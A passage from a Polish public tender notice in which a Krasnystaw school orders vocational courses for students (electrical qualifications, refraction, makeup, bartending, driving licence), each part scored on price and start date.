kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Uprawnienia elektryczne SEP dla uczniów:<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 3 grupy po 8 osób, 40h na 1 grupę.<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć;<br/>b)	przygotować materiały szkoleniowe;<br/>c)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>d)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>e)	posiadać zaplecze techniczne umożliwiające prawidłowe wykonanie kursu;	<br/>f)	ustalić termin egzaminu dla wszystkich uczestników kursu;<br/>g)	przeprowadzić egzamin; <br/>h)	wydać dokument potwierdzający nabycie kwalifikacji 1 kV. <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>b)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>c)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs refrakcji dla uczniów:<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 1 grupa 8 osób, 64h na 1 grupę.<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć;<br/>b)	przygotować materiały szkoleniowe;<br/>c)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>d)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>e)	przeprowadzić egzamin; <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>b)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>c)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur<br/>związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs wizażu i stylizacji dla uczniów:<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 3 grupy po 8 osób, 64h na 1 grupę.<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć;<br/>b)	przygotować materiały szkoleniowe;<br/>c)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>d)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>e)	posiadać zaplecze techniczne umożliwiające prawidłowe wykonanie kursu;	<br/>f)	przeprowadzić egzamin; <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>b)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być: raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>c)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs barmana Blender I stopień dla uczniów:<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 3 grupy po 8 osób, 32h na 1 grupę.<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć;<br/>b)	przygotować materiały szkoleniowe;<br/>c)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>d)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>e)	posiadać zaplecze techniczne umożliwiające prawidłowe wykonanie kursu;	<br/>f)	przeprowadzić egzamin; <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>b)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>c)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu.<br/>8)	Przykładowe tematy zajęć:<br/>charakterystyka zawodu Barmana;<br/>sprzęt barmański – jego nazewnictwo i zastosowanie;<br/>rodzaje wykorzystywanego szkła;<br/>alkoholoznastwo;<br/>mixologia;<br/>garnish – sztuka dekoracji koktajli – warsztaty ;<br/>obsługa na barze;<br/>organizacja baru i pracy barmana;<br/>koktajle –warsztaty;<br/>najnowsze trendy w barmaństwie;<br/>efektowna praca na barze – warsztaty;<br/>psychologia sprzedaży w zawodzie barmana;<br/>rozliczenia na barze oraz remanent;<br/>podstawowe zwroty anglojęzyczne w pracy na barze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs prawo jazdy kat. B dla uczniów:<br/>1)	Miejsce realizacji:<br/>Zajęcia teoretyczne: sale wykładowe Zespołu Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>Zajęcia praktyczne: plac manewrowy Zespołu Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw.<br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 3 grupy po 8 osób, czas trwania zgodnie z przepisami prawa. <br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć;<br/>b)	przygotować materiały szkoleniowe;<br/>c)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>d)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>e)	posiadać zaplecze techniczne umożliwiające prawidłowe wykonanie kursu;	<br/>f)	wydać dokument zgodny z obowiązującymi przepisami uprawniający do przystąpienia do egzaminu państwowego;<br/>a)	opłacić i ustalić dla wszystkich uczestników pierwszy termin egzaminu państwowego w ośrodku egzaminowania właściwym z punktu widzenia przeprowadzonych zajęć praktycznych. <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>d)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>e)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>f)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411000-8 - Usługi szkół jazdy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 